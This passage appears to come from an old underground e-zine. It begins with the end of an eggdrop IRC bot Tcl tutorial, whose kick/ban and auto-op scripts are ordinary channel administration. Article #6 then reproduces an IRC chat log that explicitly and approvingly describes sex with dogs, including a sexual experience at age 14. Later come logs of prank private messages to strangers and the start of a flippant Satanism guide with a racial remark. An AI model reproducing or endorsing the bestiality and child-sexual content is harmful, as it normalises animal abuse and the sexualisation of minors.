           ?       Matches any single character in string.

           [chars] Matches any character in the set given by chars.  If a
                   sequence of the form x-y appears in chars, then any
                   character between x and y, inclusive, will match.

           \x      Matches the single character x.  This provides a way of
                   avoiding the special interpretation of the characters
                   *?[]\ in pattern.

       string range string first last
           Returns a range of consecutive characters from string, starting
           with the character whose index is first and ending with the
           character whose index is last.  An index of 0 refers to the
           first character of the string.  An index of end (or any
           abbreviation of it) refers to the last character of the string.
           If first is less than zero then it is treated as if it were
           zero, and if last is greater than or equal to the length of the
           string then it is treated as if it were end.  If first is
           greater than last then an empty string is returned.

       string tolower string
           Returns a value equal to string except that all upper case
           letters have been converted to lower case.

       string toupper string
           Returns a value equal to string except that all lower case
           letters have been converted to upper case.

       string trim string ?chars?
           Returns a value equal to string except that any leading or
           trailing characters from the set given by chars are removed.  If
           chars is not specified then white space is removed (spaces,
           tabs, newlines, and carriage returns).

       string trimleft string ?chars?
           Returns a value equal to string except that any leading
           characters from the set given by chars are removed.  If chars is
           not specified then white space is removed (spaces, tabs,
           newlines, and carriage returns).
      
           This is useful for creating bans!!!
           Here is a sample kick ban script I wrote...

          proc pubm:kickban {nick host hand chan text} {
            set whom [lindex $text 0]
            # maskhost returns *!user@*.machine.end; strip the leading *!
            set mask [string trimleft [maskhost [getchanhost $whom $chan]] *!]
            set mask *!*$mask
            putmsg $chan "* Kick and Ban $whom ($mask) because [lrange $text 1 end]"
            putserv "MODE $chan -o+b $whom $mask"
            putserv "KICK $chan $whom :[lrange $text 1 end]"
          }


           Notice I had to extract the person who is getting KB'd from text.
           I then had to get his host from the command getchanhost
           (tcl-commands.doc), and then make it a usable mask host for bans.
           However maskhost returns its value as *!user@*.machine.end and I
           need a *!*, so I used 'trimleft' and it did my job.
      
       string trimright string ?chars?
           Returns a value equal to string except that any trailing
           characters from the set given by chars are removed.  If chars is
           not specified then white space is removed (spaces, tabs,
           newlines, and carriage returns).

       string wordend string index
           Returns the index of the character just after the last one in
           the word containing character index of string.  A word is
           considered to be any contiguous range of alphanumeric or
           underscore characters, or any single character other than these.

       string wordstart string index
           Returns the index of the first character in the word containing
           character index of string.  A word is considered to be any
           contiguous range of alphanumeric or underscore characters, or
           any single character other than these.
      
       
       ## V - Loops ##
      
       This section covers the following loops: foreach, for, and while 
      (thanxs for the help from the people on the Doc Project List).

       Foreach takes a list of items and goes through each one, setting it 
      as a var, then executing commands, and then goes to the next.
      
       This proc will deop any one on the chan who doesn't have +o.
      
       syntax for foreach:
      
          foreach nick [chanlist $chan] {
            # matchattr/matchchanattr take a handle, not a nick
            set hnick [nick2hand $nick]
            if {([isop $nick $chan]) && (![matchattr $hnick o]) && \
                (![matchchanattr $hnick o $chan])} {
              pushmode $chan -o $nick
            }
          }
      
      
       chanlist gives a list of people on the chan.
      
       # The Procedure #
           It first checks to make sure he's an op
           Then checks that he isn't a global op
           Then checks that he isn't a chan op
           If all work out, he is deopped; if not, nothing happens
      
       syntax for while:
      
          while {![botisop $chan]} {
            puthelp "PRIVMSG $chan :Opme!!!"
          }
      
      
       That will flood the bot off, but you get the idea?

       It will execute body until the condition changes value
      
       syntax for for:
      
          for {set x 1} {$x <= 6} {incr x} {
            puthelp "PRIVMSG $chan :$x"
          }


       First of all this script will count from 1 to 6

       The first set of {}'s happens only once, when you execute the for 
      statement.  The second {}'s is the stopper: it is checked before each 
      pass, the body runs while it is true, and the loop stops once it is 
      false.  The third {} runs every time you complete body: do it, then 
      check the stopper and do body again.
      
       ## VI - User-get/User-set ##
      
       Each user on eggdrop has a special field called "xtra" which lets you 
      store whatever you like about users.  The field size is limited so 
      don't get too excited.  :)

       It is a line where you (and your scripts) can store things the way 
      you want to, just like the "comment" line each user has.  But to 
      improve its functionality, there are two procedures which come with 
      the "toolkit.tcl" (comes in eggdrop's scripts dir) to access this field 
      in a more organized way.

       The best thing is to *only* access the xtra field using these two 
      procedures.  Make sure no other script is accessing it another way (a 
      simple way to check this is to 'grep setxtra *' and 'grep getxtra *' 
      in your scripts directory).
      
       The procs to use:
      
          user-set handle fieldname 'value...'
          user-get handle fieldname
      
      
       You can have any fieldname you like, like 'url' to store the user's 
      homepage, 'birthday', etc (check out 'set whois-fields' in eggdrop's 
      config file, which makes use of exactly these fields!).

       You name the field, set the value with user-set and don't have to 
      worry anymore.  Then retrieve the value with user-get afterwards, as in:
      
          if {[user-get Ernst url] == ""} {putlog "Ernst has no url set"}
      
      
      
       
       ## VII - Return command ##
      
       The return command has two uses.  The first is to stop the current 
      proc.  The second, and most useful, is the ability to return a 
      number, or text.

       Here's an example:
      
          if {[chkaccess $nick]} {
            pushmode $chan +o $nick
          }
      
      
       chkaccess would return a 0, or 1 and then it would op them based on 
      the return.
      
       This is from tcl-commands.doc:
      
           Several bindings pay attention to the value you return from the
           proc (using "return $value").  Usually they expect a 0 or 1, and
           failing to return any value is interpreted as a 0.

           Here's a list of the bindings that use the return value from
           procs they trigger:

           MSG   Return 1 to make the command get logged like so:
                 (nick!user@host) !handle! command

           DCC   Return 1 to make the command get logged like so:
                 #handle# command

           FIL   Return 1 to make the command get logged like so:
                 #handle# files: command

           PUB   Return 1 to make the command get logged like so:
                 <<nick>> !handle! command

           CTCP  Return 1 to ask the bot not to process the CTCP command on
                 its own.  Otherwise it would send its own response to the
                 CTCP (possibly an error message if it doesn't know how to
                 deal with it).

           FILT  Return 1 to indicate the text has been processed, and the
                 bot should just ignore it.  Otherwise it will treat the
                 text like any other.

           FLUD  Return 1 to ask the bot not to take action on the flood.
                 Otherwise it will do its normal punishment.

           RAW   Return 1 to ask the bot not to process the server text.
                 This can affect the bot's performance (by causing it to
                 miss things that it would normally act on) -- you have
                 been warned.

           WALL  Return 1 to make the command get logged like so:
                 !nick! msg
      
       syntax for return:
           return <numeric>
      
       Example:
           return 0
      
         
       ## VIII - Good Programming habits ##
      
       Many people load tons of scripts at once, and they don't want 
      conflicts!  There are a few ways to help avoid conflicts.  USE RETURN 0 
      AS LITTLE AS POSSIBLE or else it will stop all bind searching after 
      your proc.  Here are some other ideas:

       (1) Label your procs sensibly.  For example, in my scripts I 
           sometimes use
               proc mbti:antiidle {} {}
           Not something like
               proc script {} {}

       (2) Same with your variables.  If you use '-'s in your variable 
           names, then when calling them you must write ${mbti-antiidle} or 
           something like that.

       (3) If your script uses timers, make it compatible so you don't have 
           too many of them (see examples in IX).

       If you've noticed, in all my procedures I've used an indentation 
      system; I suggest you also use one.  Most common methods consist of 
      either a TAB or Double Spacing.
      
       <N> where N is the number of spaces
      
       Example
      
           proc bla {} {
           <1> global testchan
           <1> if {[botisop $testchan]} {
           <1> <2> puthelp "PRIVMSG $testchan :I'm oped!"
           <1> }
           }
      
      
       ## IX - Program Examples, then explained. ##
      
       I've taken some of these from programs I've written, or I just made 
      them up =) (Many thanxs to the people on the Doc Project Listserv for 
      suggestions!)
      
       ###
      
          bind pubm O !rules pubm:ab_rules
          proc pubm:ab_rules {nick host hand chan text} {
            set who [lindex $text 0]
            if {$who == ""} {
              # The message will not fit on one line, so each line ends in
              # a backslash to continue it; you get the idea
              putmsg $chan "There is  NO  Cursing, Harrasment, Abusing the bot,\
                Flooding, Clones, Advertising.  Violation of this policy may\
                result in a kick, and/or ban."
              return 1
            }
            putmsg $who "There is  NO  Cursing, Harrasment, Abusing the bot,\
              Flooding, Clones, Advertising.  Violation of this policy may\
              result in a kick, and/or ban."
          }
      
      
       # The Bind #
           Public Match
           Op Access on that Channel, or Global Op Access
           Trigger: !rules
           Proc Name: pubm:ab_rules
      
       # The Procedure #
           If the first parameter in $text is valid it will be set to who; 
           if it doesn't exist, who will be "".  Now it says: if who has no 
           value, msg the channel the rules of the channel.  But if there 
           is a nick, put a msg to $who.
      
       ####
      
      
       ###
      
          # Script name   : antiidle10-mbti.tcl
          # Script Version: 1.0
          # Script Author : The |mmortaL [asn@cdc.net] (PGP Public key
          #                 Available, put "send key" in the subject.)
          # Script Desc.  : An Anti Idle script for 1.1.x (Probably work with
          #                 1.0 though)

          # Please edit the following variables: (Channel to which a msg is
          # to be sent, How often that message should be sent, and what to
          # send; in that order)
          set antiidlechan #lamechan
          set antiidletime 5
          set antiidlemsg "antiidle10-mbti.tcl - Made By The |mmortaL"
      
          ## Do not change any thing under this point! ##
          ## Do not change any thing under this point! ##
          ## Do not change any thing under this point! ##
      
          # This makes all the data in $antiidlechan lower case
          set antiidlechan [string tolower $antiidlechan]
      
          # This makes sure that you're on the channel which you specified.
          # String match is case sensitive, that is why I made everything
          # lower case.  putlog is a command that puts something in the main
          # logs of the bot, and when the bot rehashes, or loads up, you see
          # that message.  return 1 stops the script from loading, in the
          # event that it isn't on that channel.
          if {![string match *$antiidlechan* [string tolower [channels]]]} {
            putlog "ERROR ERROR I am not on $antiidlechan!!!!"
            return 1
          }
      
          # VERY VERY VERY VERY VERY VERY VERY IMPORTANT!!
          # If your script is gonna cause major problems if a person
          # .rehashes, like if you set a timer, use something equivalent to
          # this:

          # Make a variable, like antiidleloaded; by default that variable
          # doesn't exist.  Put an if statement of info exists (checks to see
          # if a variable is there).  And if it isn't set to 1, set it to 1,
          # and load the timer; if the variable is there, and set to 1, then
          # do nothing.
          if {![info exists antiidleloaded]} {
            timer $antiidletime proc:antiidle
            set antiidleloaded 1
          }
      
          proc proc:antiidle {} {
            global antiidlechan antiidletime antiidlemsg
            puthelp "PRIVMSG $antiidlechan :$antiidlemsg"
            timer $antiidletime proc:antiidle
          }
      
      
      
       # This is fairly simple: put a global statement for each of the 
       # global variables, because you need to access them.  Send the msg 
       # to the channel, and then reset the timer.

       # The Bind #
           This script does not function with a bind.
           Trigger: "if {![info exists antiidleloaded]}" checks to see if 
           the script is running
           Proc Name: proc:antiidle

       # The Procedure #
           If info does not exist for $antiidleloaded, the timer for 
           proc:antiidle begins; if it does exist, proc:antiidle continues 
           running.
           When the timer fires, put $antiidlemsg to $antiidlechan and start 
           another timer
      
       ###
      
      
       ###
      
          set flag1 i
          set chanflag1 i
          set flag2 v
          set chanflag2 v
      
          bind join i * join:mbti_autoop
          bind join v * join:mbti_autovoice
          bind join - * join:mbti_cautoop
          bind join - * join:mbti_cautovoice
      
          proc join:mbti_autoop {nick host hand chan} {
            pushmode $chan +o $nick
          }
      
          proc join:mbti_autovoice {nick host hand chan} {
            pushmode $chan +v $nick
          }
      
          proc join:mbti_cautoop {nick host hand chan} {
            if {[matchchanattr $hand i $chan]} {pushmode $chan +o $nick}
          }
      
          proc join:mbti_cautovoice {nick host hand chan} {
            if {[matchchanattr $hand v $chan]} {pushmode $chan +v $nick}
          }
      
      
      
       This is a fairly easy script; the only new thing is the newflags. 
      Eggdrop lets you add new flags for as many letters as aren't already 
      used.
       Set newflag[num] z
       where [num] is a number that doesn't exist...
      
       set newchanflag[num]
       Ditto :P
      
       # The Bind #
           Join on channel
           AutoOp and AutoVoice Access on that Channel
           Trigger: users with +i or +v joining the channel
           Proc Name: join:mbti_autoop
                               join:mbti_autovoice
                               join:mbti_cautoop
                               join:mbti_cautovoice
      
       # The Procedure #
           When the join bind is triggered by the specified users, pushmode 
           $chan flag $nick; or, if matchchanattr $hand flag $chan is true, 
           pushmode $chan flag $nick
      
       ###
      
      
       ###
      
          bind mode - "*+o $botnick*" mode:automode
          proc mode:automode {nick host hand chan modechg} {
            foreach nick [chanlist $chan] {
              set hnick [nick2hand $nick]
              if {![isop $nick $chan]} {
                # not opped, but has op access: op him
                if {([matchattr $hnick o]) || ([matchchanattr $hnick o $chan])} {
                  pushmode $chan +o $nick
                }
              } elseif {[matchchanattr $hnick d $chan]} {
                # opped, but flagged +d on this channel: deop him
                pushmode $chan -o $nick
              }
            }
          }
      
      
      
       foreach nick [chanlist $chan] basically says to do this for everyone 
      in the chan.  First check to see if he has ops; if he doesn't and he 
      has OP access then op him!!
       Then if he has ops, and he's supposed to be deoped, then deop him!
       ###
      
      
      # end !@#$
      
      
      
      
      
      0000000000000000000000000000000000000000000000000000000000000000000000
      000  0000000000   0000000000000000000000000000000000000   000000000000
      000  00000000      00000000000000   00000  000 000000       0000   000
      000  00000000   0   0000000000000   00000  00  00000  00000  000   000
      000  0000000   000   000000000000   0000   00  0000 00000000 000   000
      000  0    00   000   000       00   00           0 000   0 00 00   000
      000        0   000   00        00   00           0 000 00  00 00   000
      000   00   0   000   00   00   00   0000  00  0000 00  000 00 00   000
      000  0000  0   000   0   0000  00   0000  00  0000 00  000 00 00   000
      000  0000  0   000   0   0000  00   0000 000  0000 00  000 00 00   000
      000  0000  0   000   0   0000  00   0           00 00  000 00 00   000
      000  0000  0   000   0   0000  000000           00 00  000 00 00000000
      000  000   0   000   00   00   00000000  00  00000 00  00  00 00000000
      000   0    0    0    0         00   000 000  00000 000        00   000
      000        00       000        00   000 000 0000000 000000000000   000
      000000000000000   00000000000  00000000000000000000  00000000000000000
      00000000000000000000000 0000   000000000000000000000       00000000000
      00000000000000000000000        00000000000000000000000    000000000000
      00000000000000000000000       0000000000000000000000000000000000000000
      0000000000000000000000000000000000000000000000000000000000000000000000
      
      
      
      
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      [ b0g article # 6 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ ::::::::::: Obscene log  #gaydogsex  irc.undernet.org :::::::::: ]
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      
      
      <loner> true, so tell me what is sex with a dog like?
      <PantheraD> umm.. good.. :)
      <loner> don't they get bit roough?
      <PantheraD> if you're lucky :)
      <Roxie_Dog> thay can do, if you're lucky :)
      <loner> do they bite?
      <PantheraD> yes, again. if you're lucky..
      * PantheraD likes it rought.
      <PantheraD> err.. rough
      <loner> sound painful not pleasurable
      <PantheraD> all depens on what you like.. some dogs are rough.. some 
      aren't
      <loner> don't know what i would like. never tried it with a dog
      <PantheraD> have you had sex with a man?
      <loner> couple of times
      <PantheraD> was he rough with you?
      <loner> nah, pretty gentle actually
      <PantheraD> well, did you want him to be rough?
      *** Roxie_Dog has quit IRC (Read error to Roxie_Dog[modem-
      214.iron.dialup.pol.co.uk]: Connection reset by peer)
      <loner> not really
      <PantheraD> you woudn't want a rough dog then.
      *** Roxie_Dog has joined #gaydogsex
      *** Knot sets mode: +v Roxie_Dog
      <PantheraD> wb roxie :)
      <loner> does this mean that i should stay away from dogs 
      <PantheraD> no
      <loner> cool, still want to try
      <PantheraD> just be aware that dogs won't alter the way the fuck 
      because it's to rough for you..
      <ect> panthera.. how many diff breeds and dogs have you had sex with?
      <loner> i guess i could deal with that
      <PantheraD> well, i used to work at a kennel so a lot :)
      <ect> heh. really?
      * PantheraD nods
      <PantheraD> for 3 years
      <loner> variety is the spice of life, eh?
      <ect> and?!?
      <PantheraD> so true.. :)   
      <PantheraD> and what?
      <ect> heh.. n/m what got you turned unto dogs?
      <PantheraD> but i always had my favorite. :)
      <PantheraD> saw my male lab breeding a female and i wondered what it 
      would be like to be with him
      *** nik7 has joined #gaydogsex
      <loner> how was it
      <PantheraD> hello nik, whass up>?
      <ect> and did you you?
      <PantheraD> yes.. that i did :)
      <ect> how did you get him to do that with you?
      <PantheraD> jacked him a little until he started to hump, then showed 
      him my butt. 
      <ect> ahh. and did you enjoy?
      <PantheraD> the first time, no.
      <loner> why not
      <PantheraD> i was quite young and he was very well hung...  ie, small 
      butt, big cock
      <loner> makes sense, how old were you
      <PantheraD> 14
      <loner> and how old was he
      <PantheraD> 5
      <loner> no longer a pup
      <ect> did you ever do anything with him again?
      <PantheraD> nope..    oh yes.. he was my lover for 4 years every night 
      after..
      <PantheraD> err.. no, he was not a pup...  sorry.. that was a bit 
      confusing..
      <loner> how did you get past the size difference
      <PantheraD> he was very used to breeding...    
      <ect> ever tried any other animal than dogs?
      <PantheraD> well, heh.. he just rammed it in and stretched me out...
      <loner> it must have hurt
      <PantheraD> no.. just men and dogs.. i want to try a stallion at some 
      point
      <PantheraD> yes, yes it did
      <loner> did he ever get his knot in you
      <ect> wow. a stallion huh? woo. big.
      <PantheraD> yeah, he did it the first time and just about every time 
      there after..  (i prefer to tie)
      <PantheraD> yeah!   nice big cock and a nice big load of cum :)
      <loner> i hear knots get huge
      <PantheraD> biggest i've seen was the size of a softball
      <PantheraD> (247 lb st. bernard)
      
      
      
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      [ b0g article # 7 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ :::::::::::::: grannanizing  Prae  prae@talk21.com ::::::::::::: ] 
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      
      
      
      Here it is! What you've all been waiting for.. It's a revolution in 
      home entertainment! No it's not a hands-free vibrator or even an 
      inflatable doll that gives head without chafing your penis! It's my 
      latest party trick, it's called 'Grannanizing'.. 
      And since I'm such a nice person I am going to show you how I do it. 
      :)
      
      Here is what I do.. I /msg someone and I act like an old lady who is a 
      bit nutty..
      
      
      
      <Prae> oh hello dear
      <thep0et> hi
      <Prae> i was wondering if you could help me?
      <thep0et> depends
      <Prae> its disgusting!
      <thep0et> huh
      <Prae> am i speaking to the right person?
      <thep0et> i don't know are you?
      <Prae> why?
      <Prae> that jigsaw is driving me nuts!
      <thep0et> umm ok..
      <thep0et> wtf are you talkin about
      <Prae> are you still there?
      <thep0et> possibly
      <Prae> i was wondering if you could help me?
      <thep0et> yes you asked that once
      <Prae> woo its sexy
      <thep0et> dude you smoked some bad crack or somethin
      <Prae> oh how dare you?!
      <thep0et> how dare i what
      <thep0et> what are you gonna do?
      <Prae> i cant believe you're asking me that
      <thep0et> ok.....
      <Prae> are you still there?
      <thep0et> man your fuckin loony
      <Prae> hello betty
      <thep0et> seek help please
      <thep0et> betty?
      <Prae> yes
      <thep0et> umm my name is not betty
      <Prae> in my day it never cost that much
      <thep0et> yeah. dildos are much cheaper now
      <Prae> its disgusting!
      <thep0et> your the one who brought it up
      <Prae> why?
      <thep0et> i don't know.. you tell me
      <Prae> am i speaking to the right person?
      <thep0et> do you purposly repeat your self or are you really stupid?
      <Prae> oh how dare you!
      <Prae> can you put me through to the person in charge?
      <Prae> are you still there?
      <Prae> goodbye dear.
      
      
      <Prae> oh hello dear
      <Mr_C> hello, who are u
      <Prae> its fanny speaking
      <Prae> i was wondering if you could help me?
      <Mr_C> oki. 
      <Prae> am i speaking to the right person?
      <Mr_C> i dont know
      <Prae> i was wondering if you could help me?
      <Mr_C> oki, with wht
      <Mr_C> what
      <Prae> its disgusting!
      <Mr_C> tell me
      <Prae> in my day it never cost that much
      <Prae> are you still there?
      <Prae> goodbye dear
      
      
      <Prae> oh hello dear
      <madwill> hi
      <madwill> >=]
      <Prae> i was wondering if you could help me?
      <madwill> with?
      <Prae> its disgusting!
      <madwill> what is?
      <Prae> in my day it never cost that much!
      <Prae> are you still there?
      <madwill> yeah
      <Prae> am i speaking to the right person?
      <madwill> what are you talking about?
      <madwill> no
      <madwill> i dont think so
      <Prae> why?
      <madwill> prae - what the hell are you smoking?
      <Prae> yes, its fanny speaking
      <Prae> are you still there?
      <Prae> goodbye dear
      
      
      <Prae> oh hello dear
      <twist182> hi
      <Prae> i was wondering if you could help me?
      <twist182> ok
      <twist182> why didnt your ip resolve
      <Prae> its disgusting!
      <twist182> :(
      <Prae> in my day it never cost that much
      <twist182> huh
      <Prae> am i speaking to the right person?
      <twist182> ?
      <twist182> are you drunk?
      <Prae> that jigsaw is driving me nuts
      <twist182> what the fuck are youtalking about?
      <Prae> are you still there?
      <twist182> yes
      <Prae> i was wondering if you could help me?
      <twist182> WITH WHAT
      <Prae> that jigsaw is driving me nuts
      <Prae> hello betty
      <twist182> WHAT FUCKING JIGSAW
      <Prae> i cant believe you're asking me that
      <Prae> oh how dare you!?
      <Prae> are you still there?
      <Prae> goodbye dear
      
      
      <Prae> oh hello dear
      <alcyone> Hi .
      <Prae> i was wondering if you could help me?
      <alcyone> Hm ?
      <Prae> its disgusting!
      <alcyone> What ?!
      <Prae> in my day it never cost that much
      <alcyone> -laugh
      <alcyone> Do you need a loan ?
      <Prae> am i speaking to the right person?
      <alcyone> Who knows .
      <Prae> that jigsaw is driving me nuts
      <alcyone> I bet .
      <alcyone> You should cut back on the alcohol .
      <Prae> its disgusting!
      <alcyone> I bet .
      <Prae> oh how dare you?
      <alcyone> Easily . . .
      <Prae> are you still there?
      <alcyone> For now .
      <Prae> i was wondering if you could help me?
      <alcyone> Mayhaps .
      <Prae> woo its sexy
      <alcyone> Is it ?
      <Prae> i cant believe you're asking me that
      <alcyone> Well , I did .
      <Prae> oh how dare you1?
      <Prae> hello betty
      <Prae> are you still there?
      <Prae> goodbye dear
      
      
      <Prae> oh hello dear
      <Kitty_Cat> lol.. hi prae
      <Prae> i was wondering if you could help me?
      <Kitty_Cat> with?
      <Prae> its disgusting!
      <Kitty_Cat> ?
      <Prae> am i speaking to the right person?
      <Kitty_Cat> i dont know.
      <Prae> that jigsaw is driving me nuts
      <Kitty_Cat> whom do you think you are addressing
      <Kitty_Cat> ?
      <Prae> yes, its fanny speaking
      <Kitty_Cat> huh?
      <Prae> am i speaking to the right person?
      <Kitty_Cat> i dont know.. are you on my left?
      <Prae> its disgusting!
      <Prae> in my day it never cost that much
      <Prae> are you still there?
      <Prae> goodbye dear
      
      
      <Prae> oh hello dear
      <Nala-Bebe> hi :(
      <Prae> i was wondering if you could help me?
      <Nala-Bebe> with?
      <Prae> its disgusting!
      <Prae> are you still there?
      <Prae> goodbye dear
      
      
      
      
      <Prae> oh hello dear
      <Prae> i was wondering if you could help me?
      <Prae> are you still there?
      <Thuull> I'm here
      <Prae> i was wondering if you could help me?
      <Thuull> depends, what do you need?
      <Prae> its disgusting!
      <Prae> are you still there?
      <Thuull> yes, I am...what do you need help with?
      <Prae> that jigsaw is driving me nuts
      <Prae> are you still there dear?
      <Prae> in my day it never cost that much
      <Prae> woo its sexy
      <Prae> are you still there?
      <Prae> goodbye dear
      
      
      <Prae> oh hello dear
      <frame> hi
      <Prae> i was wondering if you could help me?
      <frame> with?
      <frame> do I know you?
      <Prae> its disgusting!
      <frame> ?
      <Prae> in my day it never cost that much
      <frame> ?
      <Prae> are you still there?
      <frame> yes
      <Prae> i was wondering if you could help me?
      <frame> with?
      <Prae> i cant believe you're asking me that
      <Prae> am i speaking to the right person?
      <frame> stop begging for help and tell me wtf you want help with
      <Prae> oh how dare you!?
      <frame> I don't know
      <Prae> why?
      <frame> who do you think you are speaking to?
      <Prae> woo its sexy
      <Prae> yes, its fanny speaking
      <frame> fanny?
      <Prae> yes
      <Prae> am i speaking to the right person?
      <frame> your hostmask seems familiar
      <frame> but I don't know anyone by the name of fanny
      <Prae> ok luvvy
      <Prae> are you still there?
      <Prae> goodbye dear
      
      
      
      
      <Prae> oh hello dear
      <Prae> i was wondering if you could help me?
      <RLoxley> with?
      <Prae> its disgusting!
      <Prae> are you still there?
      <RLoxley> yes
      <Prae> i was wondering if you could help me?
      <RLoxley> i was waiting for you
      <RLoxley> with what?
      <Prae> i cant believe you're asking me that
      <RLoxley> enough games, whats on your mind
      <Prae> its disgusting
      <RLoxley> either spit it out, or i have other business
      <Prae> am i speaking to the right person?
      <RLoxley> the right person for what
      <RLoxley> you know exactly who i am
      <RLoxley> and i know exactly who you are
      <RLoxley> come to the point
      <Prae> can you put me through to the person in charge?
      <RLoxley> i am the person in charge
      <Prae> in my day it never cost that much
      <RLoxley> you are obviously insane, let me know when you return to 
      earth
      <Prae> oh how dare you!?
      <Prae> are you still there?
      <RLoxley> yes, and very busy
      <Prae> that jigsaw is driving menuts!
      <RLoxley> yes, i can see you are quite nuts
      <Prae> are you still there?
      <Prae> OH HOW DARE YOU!?
      <Prae> hello betty
      <Prae> i was wondering if you could help me?
      <RLoxley> go and take your meds
      <Prae> woo its sexy
      <Prae> are you still there?
      <RLoxley> no
      <Prae> why?
      <Prae> yes, its fanny speaking
      <Prae> are you still there dear?
      <Prae> goodbye dear
      
      
      <h2so4-> ok here.
      <h2so4-> =]
      <Prae> oh hello dear
      <Prae> i was wondering if you could help me?
      <h2so4-> hah
      <h2so4-> yes
      <h2so4-> yes
      <Prae> its disgusting!
      <h2so4-> it is?!
      <Prae> yes
      <Prae> that jigsaw is driving me nuts!
      <h2so4-> haha
      <h2so4-> what jigsaw
      <Prae> are you still there?
      <h2so4-> and whats disgusting?!
      <h2so4-> yes.
      <h2so4-> are you stoned per chance?
      <Prae> i cant believe you're asking me that
      <h2so4-> :/
      <Prae> am i speaking to the right person?
      <h2so4-> probably not...
      <h2so4-> i think you want a shrink..
      <Prae> oh how dare you!?
      <h2so4-> well i don't know?
      <Prae> woo its sexy
      <h2so4-> yes
      <h2so4-> i have jammy dodgers...
      <Prae> why?
      <h2so4-> i dont know
      <h2so4-> i dont really like them
      <h2so4-> i just eat cos im bored
      <Prae> are you still there?
      <Prae> goodbye dear
      
      
      
      <Prae> oh helo dear
      <Mister]X[> hi
      <Mister]X[> do i know u
      <Prae> i was wondering if you could help me?
      <Mister]X[> with what?
      <Prae> its disgusting!
      <Mister]X[> with what?
      <Prae> in my day it never cost that much
      <Mister]X[> really
      <Prae> yes
      <Prae> am i speaking to the right person?
      <Mister]X[> yeah
      <Mister]X[> what never cost that much
      <Prae> thats not important
      <Prae> i was wondering if you could help me?
      <Mister]X[> yeah sure
      <Prae> its disgusting!
      <Prae> are you still there?
      <Mister]X[> yes
      <Mister]X[> i am what
      <Mister]X[>  do u fucking want me to do
      <Mister]X[> just tell me
      <Prae> could you put me through to the person in charge?
      <Mister]X[> 10 seconds
      <Prae> oh how dare you!?
      <Mister]X[> no sorry
      <Prae> why?
      <Mister]X[> fuck off
      <Prae> woo its sexy
      <Prae> are you still there?
      <Mister]X[> fuckign hell its sexy
      <Mister]X[> i know
      <Mister]X[> u r telling me
      <Mister]X[> omg its so sexy
      <Prae> yes
      <Prae> its disgusting!
      <Mister]X[> i know its so fucking disgusting
      <Mister]X[> its just digusting
      <Mister]X[> so groose
      <Mister]X[> and disgraceful
      <Prae> that jigsaw is driving men uts
      <Mister]X[> ohh its o giisgusting
      <Mister]X[> its unreal
      <Prae> could you put me through to the person in charge?
      <Mister]X[> yeah,  eyghhh
      <Mister]X[> why do u wanna speak to the person in charge
      <Mister]X[> u realise u will have to take the test
      <Prae> thats not important
      <Prae> why?
      <Mister]X[> if u want to speak with the person in charge
      <Mister]X[> thats the protocol
      <Prae> hello betty
      <Mister]X[> i am affraid
      <Prae> why?
      <Prae> are you still there?
      <Prae> goodbye dear
      
      
      <Prae> oh hello dear
      <Accipiter> Um
      <Accipiter> Hi.
      <Prae> i was wondering if you could help me?
      <Accipiter> Do I know you?
      <Prae> i cant believe you're asking me that
      <Accipiter> Ok...
      <Accipiter> am I supposed to know you?
      <Prae> thats not important
      <Prae> i was wondering if you could help me?
      <Accipiter> With what?
      <Prae> its disgusting!
      <Accipiter> Just ask the question.
      <Prae> ok luv
      <Prae> are you still there?
      <Accipiter> YES.
      <Prae> wo its sexy
      [Accipiter PING]
      <Prae> are you still there?
      <Accipiter> YES. 
      <Accipiter> Ask the question already.
      <Prae> oh how dare you!?
      <Accipiter> what who
      <Prae> am i speaking to the right person?
      <Accipiter> Apparently.
      <Accipiter> Ask me what it is you want to ask.
      <Prae> can you put me through to the person in charge?
      <Accipiter> yes
      <Accipiter> i'm still here.
      <Accipiter> I am in charge.
      <Prae> its disgusting!
      <Accipiter> That's fine.,
      <Accipiter> ask.
      <Prae> that jigsaw is driving me nuts
      <Accipiter> A jigsaw puzzle is disgusting?
      <Accipiter> you have issues.
      <Prae> woo its sexy
      <Prae> are you still there?
      <Accipiter> No. I'm lying.
      <Prae> its disgusting!
      <Accipiter> I'm sure it is.
      <Prae> hello betty
      <Accipiter> hello dolly
      <Accipiter> ?
      <Prae> oh how dare you!?
      <Prae> are you still there?
      <Prae> goodbye dear
      
      
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      [ b0g article # 8 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ ::::::::::: Satanism   Vegtam  - vegtam@fjell.online.no ::::::::: ]
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      
      
      
       Do you want to be a satanist? Or do you want to know what a satanist 
      is? Well, the answers will be found here. This is a course for 
      beginners. The more skilled ones can fuck off and read something else. 
      I will only tell how to be a Satanist as a follower of Anton Szandor 
      LaVey, and not as a devil-worshipping jerk that sacrifices young 
      virgins. I will only do it briefly, tell you the basics, so if you 
      want to know more, go to http://www.churchofsatan.com. 
      
      I will now try to combine clothing style, music and the rules of being 
      a satanist.
      
      Ok, first of all, to be a Satanist, you should dress like one. Have 
      style. The basic color is of course BLACK (and due to that fact, it`s 
      even better if you are black skinned). You can use other colors like 
      red and purple, but it must match, so you have the gloomy look. Your 
      hair should be long, and colored black. You also can be shaved. Spikes 
      and leather jackets give you a raw and primitive look. But you can 
      try to look a little mystical. Wear a black coat or something. Black 
      latex will never run out of date when you are a satanist. And always 
      use army boots, or something look-a-like.
      
      If you are white, make sure your face is as pale as it can be. Never 
      take sun. That ruins your evil look. 
      Some people think it`s funny to use corpse painting...but if you`re 
      walking in a mall or something with corpse painting, you`re stupid...and 
      remember, it`s no sin to be original...
      
      You should also listen to so called dark, moody n Satanic music that 
      gets u in a dark and gloomy mood, and I don`t mean a stupid g1mp like 
      Marilyn Manson (many will maybe disagree, but he`s nothing but a jerk 
      off to me. A false rip off). Listen to classical music. Listen to 
      brutal music from the north, black metal. The most famous ones that are 
      worth a mention are Mayhem, Darkthrone, Immortal, Emperor, Enslaved, 
      Vintersorg, Satyricon, early Ulver, Finntroll....blablabla...well, at 
      least you have something to start with?
      
      Well, if you got the clothing style and maybe even started to like the 
      so called "satanic" music, we are now ready for the lesson on how 
